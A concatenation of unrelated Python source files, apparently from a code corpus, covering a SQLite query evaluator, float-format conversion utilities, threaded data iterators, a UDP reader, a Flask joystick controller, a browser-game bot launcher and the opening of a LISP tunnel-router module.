elapsed = -1
result[index] = elapsed
def __str__(self):
return "Replicated Memcached Client"
|
sql_executor.py | import logging
from typing import List
import sqlite3
import multiprocessing
from multiprocessing import Process
from allennlp.common.file_utils import cached_path
logger = logging.getLogger(__name__)
MULTIPROCESSING_LOGGER = multiprocessing.get_logger()
class SqlExecutor:
"""
This class evaluates SQL queries by connecting to a SQLite database. Because SQLite is disk-based
we just need to provide one file with the location. We execute the predicted SQL query and the labeled
queries against the database and check if they execute to the same table.
"""
def __init__(self, database_file: str) -> None:
# Initialize a cursor to our sqlite database, so we can execute SQL queries for denotation accuracy.
self._database_file = cached_path(database_file)
self._connection = sqlite3.connect(self._database_file)
self._cursor = self._connection.cursor()
def evaluate_sql_query(self, predicted_sql_query: str, sql_query_labels: List[str]) -> int:
# We set the logging level for the subprocesses to warning, otherwise, it will
# log every time a process starts and stops.
MULTIPROCESSING_LOGGER.setLevel(logging.WARNING)
# Since the query might hang, we run in another process and kill it if it
# takes too long.
process = Process(
target=self._evaluate_sql_query_subprocess, args=(predicted_sql_query, sql_query_labels)
)
process.start()
# If the query has not finished in 3 seconds then we will proceed.
process.join(3)
denotation_correct = process.exitcode # type: ignore
if process.is_alive():
logger.warning("Evaluating query took over 3 seconds, skipping query")
process.terminate()
process.join()
if denotation_correct is None:
denotation_correct = 0
return denotation_correct
def _evaluate_sql_query_subprocess(
self, predicted_query: str, sql_query_labels: List[str]
) -> int:
"""
We evaluate here whether the predicted query and the query label evaluate to the
exact same table. This method is only called by the subprocess, so we just exit with
1 if it is correct and 0 otherwise.
"""
postprocessed_predicted_query = self.postprocess_query_sqlite(predicted_query)
try:
self._cursor.execute(postprocessed_predicted_query)
predicted_rows = self._cursor.fetchall()
except sqlite3.Error as error:
logger.warning(f"Error executing predicted: {error}")
exit(0)
# If predicted table matches any of the reference tables then it is counted as correct.
target_rows = None
for sql_query_label in sql_query_labels:
postprocessed_sql_query_label = self.postprocess_query_sqlite(sql_query_label)
try:
self._cursor.execute(postprocessed_sql_query_label)
target_rows = self._cursor.fetchall()
except sqlite3.Error as error:
logger.warning(f"Error executing predicted: {error}")
if predicted_rows == target_rows:
exit(1)
exit(0)
@staticmethod
def postprocess_query_sqlite(query: str):
# The dialect of SQL that SQLite takes is not exactly the same as the labeled data.
# We strip off the parentheses that surround the entire query here.
query = query.strip()
if query.startswith("("):
return query[1 : query.rfind(")")] + ";"
return query
|
test_joinablequeue_example_default.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# @autor: Ramón Invarato Menéndez
# @version 1.0
import threading
from quick_queue.quick_queue import QJoinableQueue
"""
Execute this script to see result in console
Add some values to qJoinQueue
Code example from https://docs.python.org/3/library/queue.html#queue.Queue.join
"""
qjq = QJoinableQueue()
def worker():
print("Worker")
while True:
item = qjq.get()
print(f'Working on {item}')
print(f'Finished {item}')
qjq.task_done()
# turn-on the worker thread
threading.Thread(target=worker, daemon=True).start()
# send thirty task requests to the worker
for item in range(30):
qjq.put(item)
print('All task requests sent\n', end='')
# block until all tasks are done
qjq.join()
print('All work completed')
|
conversion.py | """Conversions between some common numeric types (float, np.floatXX) and
universal m/exp notation.
"""
import sys
import math
import numpy as np
import gmpy2 as gmp
mpfr_t = type(gmp.mpfr())
from .integral import bitmask
# reusable definitions
ROUND_NEAREST_EVEN = 1
ROUND_NEAREST_AWAY = 2
ROUND_UP = 3
ROUND_DOWN = 4
ROUND_TO_ZERO = 5
ROUND_AWAY_FROM_ZERO = 6
def _np_byteorder(ftype):
"""Converts from numpy byteorder conventions for a floating point datatype
to sys.byteorder 'big' or 'little'.
"""
bo = np.dtype(ftype).byteorder
if bo == '=':
return sys.byteorder
elif bo == '<':
return 'little'
elif bo == '>':
return 'big'
else:
raise ValueError('unknown numpy byteorder {} for dtype {}'.format(repr(bo), repr(ftype)))
# Mini format datasheet.
# For all formats:
# emax = (1 << (w - 1)) - 1
# emin = 1 - emax
# n = emin - p
def fdata(ftype):
if ftype == np.float16:
return {
'w' : 5,
'p' : 11,
'emax' : 15,
'emin' : -14,
'n' : -25,
'pbits' : 10,
'nbytes' : 2,
}
elif ftype == np.float32:
return {
'w' : 8,
'p' : 24,
'emax' : 127,
'emin' : -126,
'n' : -150,
'pbits' : 23,
'nbytes' : 4,
}
elif ftype == np.float64 or ftype == float:
return {
'w' : 11,
'p' : 53,
'emax' : 1023,
'emin' : -1022,
'n' : -1075,
'pbits' : 52,
'nbytes' : 8,
}
elif ftype == np.float128:
raise ValueError('unsupported: machine-dependent 80-bit longdouble')
else:
TypeError('expected float or np.float{{16,32,64}}, got {}'.format(repr(ftype)))
# Get status flags out of numeric types
def is_neg(f):
"""Get the sign bit of a float or mpfr."""
if isinstance(f, mpfr_t):
if gmp.is_zero(f):
#TODO: this is terrible
return str(f).startswith('-')
elif gmp.is_nan(f):
raise ValueError('mpfr NaNs are unsigned')
else:
return gmp.sign(f) < 0
else:
if isinstance(f, float):
f = np.float64(f)
offset = 63
elif isinstance(f, np.float16):
offset = 15
elif isinstance(f, np.float32):
offset = 31
elif isinstance(f, np.float64):
offset = 63
else:
raise TypeError('expected mpfr, float, or np.float{{16,32,64}}, got {}'.format(repr(type(f))))
bits = int.from_bytes(f.tobytes(), _np_byteorder(type(f)))
return bits >> offset != 0
def is_inf(f):
"""Check whether a float or mpfr is inf or -inf."""
if isinstance(f, mpfr_t):
return gmp.is_inf(f)
elif isinstance(f, float):
return math.isinf(f)
elif isinstance(f, np.float16):
return np.isinf(f)
elif isinstance(f, np.float32):
return np.isinf(f)
elif isinstance(f, np.float64):
return np.isinf(f)
else:
raise TypeError('expected mpfr, float, or np.float{{16,32,64}}, got {}'.format(repr(type(f))))
def is_nan(f):
"""Check whether a float or mpfr is nan."""
if isinstance(f, mpfr_t):
return gmp.is_nan(f)
elif isinstance(f, float):
return math.isnan(f)
elif isinstance(f, np.float16):
return np.isnan(f)
elif isinstance(f, np.float32):
return np.isnan(f)
elif isinstance(f, np.float64):
return np.isnan(f)
else:
raise TypeError('expected mpfr, float, or np.float{{16,32,64}}, got {}'.format(repr(type(f))))
# Other non-real properties of numeric types
def float_to_payload(f):
"""Get the integer payload of a float that is NaN."""
if isinstance(f, float):
pbits = 52
f = np.float64(f)
elif isinstance(f, np.float16):
pbits = 10
elif isinstance(f, np.float32):
pbits = 23
elif isinstance(f, np.float64):
pbits = 52
else:
raise TypeError('expected float or np.float{{16,32,64}}, got {}'.format(repr(type(f))))
if not np.isnan(f):
raise ValueError('expecting NaN, got {}'.format(repr(f)))
bits = int.from_bytes(f.tobytes(), _np_byteorder(type(f)))
return bits & bitmask(pbits)
# Conversions to and from mantissa / exponent form
def float_to_mantissa_exp(f):
"""Converts a python or numpy float into universal m, exp representation:
f = m * 2**e. If the float does not represent a real number (i.e. it is inf
or NaN) this will raise an exception.
"""
if isinstance(f, float):
w = 11
emax = 1023
pbits = 52
f = np.float64(f)
elif isinstance(f, np.float16):
w = 5
emax = 15
pbits = 10
elif isinstance(f, np.float32):
w = 8
emax = 127
pbits = 23
elif isinstance(f, np.float64):
w = 11
emax = 1023
pbits = 52
else:
raise TypeError('expected float or np.float{{16,32,64}}, got {}'.format(repr(type(f))))
bits = int.from_bytes(f.tobytes(), _np_byteorder(type(f)))
S = bits >> (w + pbits) & bitmask(1)
E = bits >> (pbits) & bitmask(w)
C = bits & bitmask(pbits)
e = E - emax
if E == 0:
# subnormal
if S == 0:
m = C
else:
m = -C
exp = -emax - pbits + 1
elif e <= emax:
# normal
if S == 0:
m = C | (1 << pbits)
else:
m = -(C | (1 << pbits))
exp = e - pbits
else:
# nonreal
raise ValueError('nonfinite value {}'.format(repr(f)))
return m, exp
def float_from_mantissa_exp(m, exp, ftype=float):
"""Converts universal m, exp representation into a python or numpy
float according to ftype.
TODO: this implementation is incapable of rounding: if it is not given
enough precision, it will complain to stdout, and if it is given too much,
it will raise an exception rather than trying to round.
"""
if ftype == float:
w = 11
p = 53
emax = 1023
emin = -1022
pbits = 52
nbytes = 8
elif ftype == np.float16:
w = 5
p = 11
emax = 15
emin = -14
pbits = 10
nbytes = 2
elif ftype == np.float32:
w = 8
p = 24
emax = 127
emin = -126
pbits = 23
nbytes = 4
elif ftype == np.float64:
w = 11
p = 53
emax = 1023
emin = -1022
pbits = 52
nbytes = 8
else:
raise TypeError('expected float or np.float{{16,32,64}}, got {}'.format(repr(ftype)))
if m >= 0:
S = 0
c = m
else:
S = 1
c = -m
cbits = c.bit_length()
e = exp + cbits - 1
if e < emin:
# subnormal
lz = (emin - 1) - e
if lz > pbits or (lz == pbits and cbits > 0):
raise ValueError('exponent out of range: {}'.format(e))
elif lz + cbits > pbits:
raise ValueError('too much precision: given {}, can represent {}'.format(cbits, pbits - lz))
E = 0
C = c << (lz - (pbits - cbits))
elif e <= emax:
# normal
if cbits > p:
raise ValueError('too much precision: given {}, can represent {}'.format(cbits, p))
elif cbits < p:
print('Warning: inventing {} low order bits!'.format(p - cbits))
E = e + emax
C = (c << (p - cbits)) & bitmask(pbits)
else:
# overflow
raise ValueError('exponent out of range: {}'.format(e))
f = np.frombuffer(
((S << (w + pbits)) | (E << pbits) | C).to_bytes(nbytes, _np_byteorder(ftype)),
dtype=ftype, count=1, offset=0,
)[0]
if ftype == float:
return float(f)
else:
return f
def float64_from_mantissa_exp(m, exp):
"""Converts universal m, exp representation into a numpy float64,
as float_from_mantissa_exp.
"""
return float_from_mantissa_exp(m, exp, ftype=np.float64)
def float32_from_mantissa_exp(m, exp):
"""Converts universal m, exp representation into a numpy float32,
as float_from_mantissa_exp.
"""
return float_from_mantissa_exp(m, exp, ftype=np.float32)
def float16_from_mantissa_exp(m, exp):
"""Converts universal m, exp representation into a numpy float16,
as float_from_mantissa_exp.
"""
return float_from_mantissa_exp(m, exp, ftype=np.float16)
def mpfr_to_mantissa_exp(f):
"""Converts a gmpy2 mpfr into universal m, exp representation:
f = m * 2**e. If the mpfr does not represent a real number, then
this will raise an exception. Note that for real numbers, the behavior
is identical to f.as_mantissa_exp() except the results are converted
to python ints instead of gmpy2.mpz.
"""
m, exp = f.as_mantissa_exp()
return int(m), int(exp)
def mpfr_from_mantissa_exp(m, exp):
"""Converts universal m, exp representation into a gmpy2 mpfr. The mpfr will
always reflect the inherent precision of m and exp, unless m is fewer than 2 bits
long, in which case the resulting mpfr will have a precision of 2.
"""
mbits = m.bit_length()
ebits = exp.bit_length()
# Apparently a multiplication between a small precision 0 and a huge
# scale can raise a Type error indicating that gmp.mul() requires two
# mpfr arguments - we can avoid that case entirely by special-casing
# away the multiplication.
if mbits == 0:
with gmp.context(
precision=2,
emin=-1,
emax=1,
trap_underflow=True,
trap_overflow=True,
trap_inexact=True,
trap_invalid=True,
trap_erange=True,
trap_divzero=True,
):
return gmp.mpfr(0)
else:
with gmp.context(
precision=max(2, ebits),
emin=min(-1, exp),
emax=max(1, ebits, exp + 1),
trap_underflow=True,
trap_overflow=True,
trap_inexact=True,
trap_invalid=True,
trap_erange=True,
trap_divzero=True,
):
scale = gmp.exp2(exp)
with gmp.context(
precision=max(2, mbits),
emin=min(-1, exp),
emax=max(1, mbits, exp + mbits),
trap_underflow=True,
trap_overflow=True,
trap_inexact=True,
trap_invalid=True,
trap_erange=True,
trap_divzero=True,
):
c = gmp.mpfr(m)
return gmp.mul(c, scale)
def numeric_to_mantissa_exp(x):
"""Convert any type that can be interpreted as a number to
universal m, exp representation: x = m * 2**e.
"""
if isinstance(x, int):
return (x, 0)
elif isinstance(x, float) or isinstance(x, np.float16) or isinstance(x, np.float32) or isinstance(x, np.float64):
return float_to_mantissa_exp(x)
elif isinstance(x, mpfr_t):
return mpfr_to_mantissa_exp(x)
else:
raise TypeError('{}: not a numeric type'.format(repr(x)))
def numeric_to_signed_mantissa_exp(x):
"""Convert any type that can be interpreted as a number to
universal sign, m, exp representation: x = m * 2**e, with an explicit
sign so that the sign of floating point zeros is not lost.
"""
if isinstance(x, int):
return (x < 0, abs(x), 0)
elif isinstance(x, float) or isinstance(x, np.float16) or isinstance(x, np.float32) or isinstance(x, np.float64):
m, exp = float_to_mantissa_exp(x)
return (is_neg(x), abs(m), exp)
elif isinstance(x, mpfr_t):
m, exp = mpfr_to_mantissa_exp(x)
return (is_neg(x), abs(m), exp)
else:
raise TypeError('{}: not a numeric type'.format(repr(x)))
# Some basic tests
# denormal numbers will puke out more precision than they really have;
# this is harmless for correctness testing, as all we're going to do
# is compare things for exact equality
def _float_to_mpfr(f):
if isinstance(f, float):
p = 53
n = -1075
emin = -1022
emax = 1024 # emax + 1
elif isinstance(f, np.float16):
p = 11
n = -25
emin = -14
emax = 16 # emax + 1
f = float(f)
elif isinstance(f, np.float32):
p = 24
n = -150
emin = -126
emax = 128 # emax + 1
f = float(f)
elif isinstance(f, np.float64):
p = 53
n = -1075
emin = -1022
emax = 1024 # emax + 1
f = float(f)
else:
raise TypeError('expected float or np.float{{16,32,64}}, got {}'.format(repr(type(f))))
with gmp.context(
precision=p,
emin=n,
emax=emax,
trap_underflow=True,
trap_overflow=True,
trap_inexact=True,
trap_invalid=True,
trap_erange=True,
trap_divzero=True,
):
return gmp.mpfr(f)
# always use precision of doubles (math.frexp is for doubles anyway)
def _mpfr_from_frexp(fraction, exponent):
with gmp.context(
precision=53,
emin=-1075,
emax=1025, # emax + 2
trap_underflow=True,
trap_overflow=True,
trap_inexact=True,
trap_invalid=True,
trap_erange=True,
trap_divzero=True,
):
c = gmp.mpfr(fraction)
scale = gmp.exp2(exponent)
return gmp.mul(c, scale)
def _check_agreement(i, ftype):
if ftype == float:
nbytes = 8
elif ftype == np.float16:
nbytes = 2
elif ftype == np.float32:
nbytes = 4
elif ftype == np.float64:
nbytes = 8
else:
raise TypeError('expected float or np.float{{16,32,64}}, got {}'.format(repr(type(f))))
try:
f = np.frombuffer(i.to_bytes(nbytes, _np_byteorder(ftype)), dtype=ftype, count=1, offset=0)[0]
if np.isinf(f) or np.isnan(f):
# raise OverflowError('not a real number: {}'.format(f))
return # TODO: this could do something
if ftype == float:
f = float(f)
m, exp = float_to_mantissa_exp(f)
f1 = float_from_mantissa_exp(m, exp, ftype)
r = mpfr_from_mantissa_exp(m, exp)
r1 = _float_to_mpfr(f)
r2 = _mpfr_from_frexp(*math.frexp(f))
m1, exp1 = mpfr_to_mantissa_exp(r)
errs = ''
if not (f == f1):
errs += ' f failed to round trip through m, exp: {} = {}'.format(f, f1)
if not (m == m1 and exp == exp1):
if m == 0:
pass # IEEE 754 floats report small exponents for 0 (smaller than smallest denorm...), while mpfr reports 1
elif abs(m) == 1 and abs(m1) == 2 and exp1 == exp - 1:
pass # The smallest denorm has less than 2 precision, which mpfr can't represent
else:
errs += ' m, exp failed to round trip through mpfr: {} = {}, {} = {}\n'.format(m, m1, exp, exp1)
if not r == r1 == r2:
errs += ' mpfr forms disagree: {} = {} = {}\n'.format(repr(r), repr(r1), repr(r2))
if errs != '':
print('disagreement on {}, {}, {}'.format(i, ftype, f))
print(errs)
except Exception as e:
print('Unexpected exception on {}, {}'.format(i, ftype))
raise e
def _test():
import random
print('Watch for output ...')
print('-- testing all np.float16 --')
for i in range(1 << 16):
_check_agreement(i, np.float16)
tests = 1 << 20
n32 = tests
n64 = tests
nfloat = tests
print('-- testing {} np.float32 --'.format(n32))
imax = bitmask(32)
for i in range(n32):
_check_agreement(random.randint(0, imax), np.float32)
print('-- testing {} np.float64 --'.format(n64))
imax = bitmask(64)
for i in range(n64):
_check_agreement(random.randint(0, imax), np.float64)
print('-- testing {} float --'.format(nfloat))
imax = bitmask(64)
for i in range(nfloat):
_check_agreement(random.randint(0, imax), np.float64)
print('... Done.')
# this consumes many cores and takes cpu-days
def _test_all_fp32(ncores = None):
import multiprocessing
if ncores is None:
ncores = multiprocessing.cpu_count()
tests = 1 << 32
blocksize = tests // ncores
procs = []
for n in range(ncores):
start = n * blocksize
if n < ncores - 1:
end = (n+1) * blocksize
else:
end = tests
p = multiprocessing.Process(target=_test_all_fp32_between, args=(start,end))
procs.append(p)
print('Watch for output ...')
for p in procs:
p.start()
for p in procs:
p.join()
print('... Done.')
def _test_all_fp32_between(start, end):
print('-- testing all np.float32 from {} to {} --'.format(start, end))
ndots = 100 # per core
mod = (end - start) // ndots
output_on = mod - 1
for i in range(start, end):
_check_agreement(i, np.float32)
if i % mod == output_on:
print('.', end='', flush=True)
def _test_big_mpfrs():
import random
print('Watch for output ...')
tests = 1 << 20
print('-- testing {} big mpfrs --'.format(tests))
for _ in range(tests):
l = random.randint(0, 1)
if l == 0:
llen = random.randint(1, 1024)
lbits = random.randint(0, bitmask(llen))
else:
lbits = 1
m = random.randint(0, 1)
if m == 0:
offset = random.randint(1, 2048)
else:
offset = 0
r = random.randint(0, 2)
if r == 0:
rlen = random.randint(1, 1024)
rbits = random.randint(0, bitmask(rlen))
elif r == 1:
rbits = 1
else:
rbits = 0
m = (lbits << (offset + rbits.bit_length())) | rbits
exp = random.randint(-65535, 65535)
f = mpfr_from_mantissa_exp(m, exp)
m1, exp1 = mpfr_to_mantissa_exp(f)
if not (m == m1 and exp == exp1):
if m == 0:
pass # IEEE 754 floats report small exponents for 0 (smaller than smallest denorm...), while mpfr reports 1
elif abs(m) == 1 and abs(m1) == 2 and exp1 == exp - 1:
pass # The smallest denorm has less than 2 precision, which mpfr can't represent
else:
print('disagreement on {} << {} . {}'.format(lbits, offset, rbits))
print(' m, exp failed to round trip through mpfr: {} = {}, {} = {}\n'.format(m, m1, exp, exp1))
print('... Done.')
|
memmap_iterator.py | import numpy as np
from keras.preprocessing.image import Iterator
from queue import Queue
from threading import Thread
import time
class MemmapIterator():
def __init__(self, memmap_path, memmap_shape, images_df, num_classes=None, batch_size=32, shuffle=True, seed=None,
pool_wrokers=4, use_side_input=False):
if seed:
np.random.seed(seed)
self.x = np.memmap(memmap_path, dtype=np.float32, mode='r', shape=memmap_shape)
self.images_df = images_df
self.images_df_index = np.copy(self.images_df.index.values)
self.images_df_num_imgs = np.copy(self.images_df.num_imgs.as_matrix())
self.images_df_img_idx = np.copy(self.images_df.img_idx.as_matrix())
self.has_y = 'category_idx' in images_df.columns
if self.has_y:
self.images_df_category_idx = np.copy(self.images_df.category_idx.as_matrix())
del self.images_df
self.num_classes = num_classes
self.batch_size = batch_size
self.shuffle = shuffle
self.use_side_input = use_side_input
self.samples = len(self.images_df_index)
self.it = Iterator(self.samples, self.batch_size, self.shuffle, seed)
self.queue = Queue(maxsize=40)
self.stop_flag = False
self.threads = []
for i in range(pool_wrokers):
thread = Thread(target=self.read_batches)
thread.start()
self.threads.append(thread)
def read_batches(self):
while True:
if self.stop_flag == True:
return
with self.it.lock:
index_array = next(self.it.index_generator)[0]
m1 = np.zeros((len(index_array), *self.x.shape[1:]), dtype=np.float32)
if self.use_side_input:
m2 = np.zeros((len(index_array), 8), dtype=np.float32)
if self.has_y:
p = np.zeros(len(index_array), dtype=np.float32)
for bi, i in enumerate(index_array):
m1[bi] = self.x[self.images_df_index[i]]
if self.use_side_input:
m2[bi, self.images_df_num_imgs[i] - 1] = 1
m2[bi, 4 + self.images_df_img_idx[i]] = 1
if self.has_y:
# noinspection PyUnboundLocalVariable
p[bi] = self.images_df_category_idx[i]
if self.use_side_input:
inputs = [m1, m2]
else:
inputs = m1
if self.has_y:
self.queue.put((inputs, p))
else:
self.queue.put(inputs)
def next(self):
return self.queue.get()
def terminate(self):
self.stop_flag = True
while True:
try:
while True:
self.queue.get(block=False)
except:
pass
live_threads = 0
for thread in self.threads:
live_threads += 1 if thread.is_alive() else 0
if live_threads == 0:
return
print('Threads running ', live_threads)
for thread in self.threads:
thread.join(timeout=5)
def __iter__(self):
return self
def __next__(self, *args, **kwargs):
return self.next(*args, **kwargs)
|
UDPReader.py | import struct
import socket
import abc
import threading
import traceback
import time
class UDPReader:
def __init__(self, port):
self.MAX_DGRAM = 2**16
self.port = port
self.loop = 1
self.running = 0
def dump_buffer(self, s):
while True:
seg, addr = s.recvfrom(self.MAX_DGRAM)
if struct.unpack("B", seg[0:1])[0] == 1:
break
def start(self):
self.loop = 1
thread = threading.Thread(target=self.Loop)
thread.daemon = True
thread.start()
def Loop(self):
self.s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.s.bind(('', self.port))
dat = b''
self.dump_buffer(self.s)
while self.loop == 1:
self.running = 1
try:
seg, addr = self.s.recvfrom(self.MAX_DGRAM)
if struct.unpack("B", seg[0:1])[0] > 1:
dat += seg[1:]
else:
dat += seg[1:]
self.Process(str(dat, 'utf-8'))
dat = b''
except OSError:
# OSError: [WinError 10038] An operation was attempted on something that is not a socket
traceback.print_exc()
print(e)
except Exception as e:
traceback.print_exc()
print(e)
self.running = 0
def stop(self):
self.loop = 0
try:
if hasattr(self, "s") and self.s is not None:
self.s.shutdown(socket.SHUT_RDWR)
except (socket.error, OSError, ValueError):
pass
@abc.abstractmethod
def Process(self, value):
pass |
web.py | #!/usr/bin/env python3
from flask import Flask
import time
import threading
import cereal.messaging as messaging
app = Flask(__name__)
pm = messaging.PubMaster(['testJoystick'])
index = """
<html>
<head>
<script src="https://github.com/bobboteck/JoyStick/releases/download/v1.1.6/joy.min.js"></script>
</head>
<body>
<div id="joyDiv" style="width:100%;height:100%"></div>
<script type="text/javascript">
// Create JoyStick object into the DIV 'joyDiv'
var joy = new JoyStick('joyDiv');
setInterval(function(){
var x = -joy.GetX()/100;
var y = joy.GetY()/100;
let xhr = new XMLHttpRequest();
xhr.open("GET", "/control/"+x+"/"+y);
xhr.send();
}, 50);
</script>
"""
@app.route("/")
def hello_world():
return index
last_send_time = time.time()
@app.route("/control/<x>/<y>")
def control(x, y):
global last_send_time
x,y = float(x), float(y)
x = max(-1, min(1, x))
y = max(-1, min(1, y))
dat = messaging.new_message('testJoystick')
dat.testJoystick.axes = [y,x]
dat.testJoystick.buttons = [False]
pm.send('testJoystick', dat)
last_send_time = time.time()
return ""
def handle_timeout():
while 1:
this_time = time.time()
if (last_send_time+0.5) < this_time:
print("timeout, no web in %.2f s" % (this_time-last_send_time))
dat = messaging.new_message('testJoystick')
dat.testJoystick.axes = [0,0]
dat.testJoystick.buttons = [False]
pm.send('testJoystick', dat)
time.sleep(0.1)
if __name__ == '__main__':
threading.Thread(target=handle_timeout, daemon=True).start()
app.run(host="0.0.0.0")
|
__init__.py | #!/usr/bin/python
import configparser
import os
import threading
import logging
from debrisField import DebrisField
from saving import Saving
from expedition import Expedition
from utils import Utils
from properties import Properties
from probe import Probe
from loguru import logger
########################
# run prob bot #
########################
def run_prob_bot(test_):
logging.info("Thread %s: starting", 'run_prob_bot')
probe = Probe(properties, empire, telegram, utils)
all_inactive_planets = []
if properties.PROBES_TAKE_BEST_PLANETS and properties.PROBES_DELETE_OLD_SPY_REPORTS is True:
all_inactive_planets = probe.get_best_planets()
elif properties.PROBES_TAKE_BEST_PLANETS is False and properties.PROBES_DELETE_OLD_SPY_REPORTS is True:
all_inactive_planets = probe.get_inactive_planetsself() # get inactives planets
# send probes
spy_reports = None
if properties.PROBES_DELETE_OLD_SPY_REPORTS is False:
spy_reports = probe.print_report(properties.PROBES_LENGTH_OLD_SPY_REPORTS)
else:
probe.send_probes(all_inactive_planets)
spy_reports = probe.print_report(
int(len(all_inactive_planets) / 10) + (len(all_inactive_planets) % 10 > 0)) # print spy reports
probe.run_auto_probe(spy_reports)
logging.info("Thread %s: finishing", 'run_prob_bot')
########################
# run debris bot #
########################
def run_debris_bot(test_):
logging.info("Thread %s: starting", 'run_debris_bot')
debris = DebrisField(properties, empire, telegram, utils)
debris.auto_collect_debris_fields()
logging.info("Thread %s: finishing", 'run_debris_bot')
########################
# run save bot #
########################
def run_save_bot(test_):
logging.info("Thread %s: starting", 'run_save_bot')
saving = Saving(properties, empire, telegram, utils)
saving.auto_run_saving()
logging.info("Thread %s: finishing", 'run_save_bot')
########################
# run expedition bot #
########################
def run_expedition_bot(test_):
logging.info("Thread %s: starting", 'run_expedition_bot')
expedition = Expedition(properties, empire, telegram, utils)
expedition.auto_run_expedition()
logging.info("Thread %s: finishing", 'run_expedition_bot')
# Press the green button in the gutter to run the script.
if __name__ == '__main__':
# init log
logger.add("log/file_{time}.log")
# vars
config = configparser.ConfigParser()
path = '/'.join((os.path.abspath(__file__).replace('\\', '/')).split('/')[:-1])
config.read(os.path.join(path, '../config.cfg'))
# init objects
utils = Utils(config['Login'], config['Telegram'])
empire = utils.empire
telegram = utils.telegram
properties = Properties(empire)
try:
format = "%(asctime)s: %(message)s"
logging.basicConfig(format=format, level=logging.INFO, datefmt="%H:%M:%S")
threads = list()
# thread probes
if properties.BOT_PROBE:
logging.info("Main : create and start thread %s.", 'probs')
bot_prob = threading.Thread(target=run_prob_bot, args=(properties,))
threads.append(bot_prob)
bot_prob.start()
# thread saving
if properties.BOT_EXPEDITIONS:
logging.info("Main : create and start thread %s.", 'expeditions')
bot_expedition = threading.Thread(target=run_expedition_bot, args=(properties,))
threads.append(bot_expedition)
bot_expedition.start()
# thread saving
if properties.BOT_SAVE:
logging.info("Main : create and start thread %s.", 'saving')
bot_saving = threading.Thread(target=run_save_bot, args=(properties,))
threads.append(bot_saving)
bot_saving.start()
# thread debris
if properties.BOT_DEBRIS:
logging.info("Main : create and start thread %s.", 'debris')
bot_debris = threading.Thread(target=run_debris_bot, args=(properties,))
threads.append(bot_debris)
bot_debris.start()
for index, thread in enumerate(threads):
logging.info("Main : before joining thread %d.", index)
thread.join()
logging.info("Main : thread %d done", index)
except:
print("Error: unable to start thread")
while 1:
pass
|
lisp-rtr.py | # -----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp-rtr.py
#
# This file performs LISP Reencapsualting Tunnel Router (RTR) functionality.
#
# -----------------------------------------------------------------------------
import lisp
import lispconfig
import socket
import time
import select
import threading
import pcappy
import os
import copy
#------------------------------------------------------------------------------
#
# Global data structures relative to the lisp-itr process.
#
lisp_send_sockets = [None, None, None]
lisp_ipc_listen_socket = None
lisp_ipc_punt_socket = None
lisp_ephem_listen_socket = None
lisp_ephem_port = lisp.lisp_get_ephemeral_port()
lisp_raw_socket = None
lisp_raw_v6_socket = None
lisp_periodic_timer = None
lisp_threads = []
#------------------------------------------------------------------------------
#
# lisp_rtr_show_command
#
# Display state in an RTR.
#
def lisp_rtr_show_command(parameter):
global lisp_threads
return(lispconfig.lisp_itr_rtr_show_command(parameter, "RTR",
lisp_threads))
#enddef
#
# lisp_rtr_show_command_dns
#
# Display state in an RTR but pass in boolean to not do a DNS lookup.
#
def lisp_rtr_show_command_dns(parameter):
global lisp_threads
return(lispconfig.lisp_itr_rtr_show_command(parameter, "RTR", lisp_threads,
True))
#enddef
#
# lisp_rtr_show_keys_command
#
# Call lispconfig.lisp_show_crypto_list().
#
def lisp_rtr_show_keys_command(parameter):
return(lispconfig.lisp_show_crypto_list("RTR"))
#enddef
#
# lisp_rtr_database_mapping_command
#
# Add database-mapping entry so RTR can sign Map-Requests.
#
def lisp_rtr_database_mapping_command(kv_pair):
lispconfig.lisp_database_mapping_command(kv_pair)
#enddef
#
# lisp_rtr_show_rloc_probe_command
#
# Display RLOC-probe list state in an RTR.
#
def lisp_rtr_show_rloc_probe_command(parameter):
return(lispconfig.lisp_itr_rtr_show_rloc_probe_command("RTR"))
#enddef
#
# lisp_fix_rloc_encap_state_entry
#
# Examine one map-cache entry.
#
def lisp_fix_rloc_encap_state_entry(mc, parms):
lisp_sockets, rloc, port, hostname = parms
addr = "{}:{}".format(rloc.print_address_no_iid(), port)
eid = lisp.green(mc.print_eid_tuple(), False)
msg = "Changed '{}' translated address:port to {} for EID {}, {} {}". \
format(hostname, lisp.red(addr, False), eid, "{}", "{}")
for rloc_entry in mc.rloc_set:
if (rloc_entry.rle):
for rle_node in rloc_entry.rle.rle_nodes:
if (rle_node.rloc_name != hostname): continue
rle_node.store_translated_rloc(rloc, port)
old_addr = rle_node.address.print_address_no_iid() + ":" + \
str(rle_node.translated_port)
lisp.lprint(msg.format("RLE", old_addr))
#endfor
#endif
if (rloc_entry.rloc_name != hostname): continue
#
# Update lisp-crypto encap array. Put keys in new dictionary array
# location since translated address and port changed. We don't want
# to rekey because of a NAT change.
#
old_addr = rloc_entry.rloc.print_address_no_iid() + ":" + \
str(rloc_entry.translated_port)
if (lisp.lisp_crypto_keys_by_rloc_encap.has_key(old_addr)):
keys = lisp.lisp_crypto_keys_by_rloc_encap[old_addr]
lisp.lisp_crypto_keys_by_rloc_encap[addr] = keys
#endif
#
# Update translated information with new information.
#
rloc_entry.delete_from_rloc_probe_list(mc.eid, mc.group)
rloc_entry.store_translated_rloc(rloc, port)
rloc_entry.add_to_rloc_probe_list(mc.eid, mc.group)
lisp.lprint(msg.format("RLOC", old_addr))
#
# Trigger RLOC-probe if enabled.
#
if (lisp.lisp_rloc_probing):
seid = None if (mc.group.is_null()) else mc.eid
deid = mc.eid if (mc.group.is_null()) else mc.group
lisp.lisp_send_map_request(lisp_sockets, 0, seid, deid, rloc_entry)
#endif
#endfor
#
# Write change to external data-plane.
#
lisp.lisp_write_ipc_map_cache(True, mc)
return(True, parms)
#enddef
#
# lisp_fix_rloc_encap_state_walk
#
# Walk main cache and source-cache for each entry to handle multicast entries.
#
def lisp_fix_rloc_encap_state_walk(mc, parms):
#
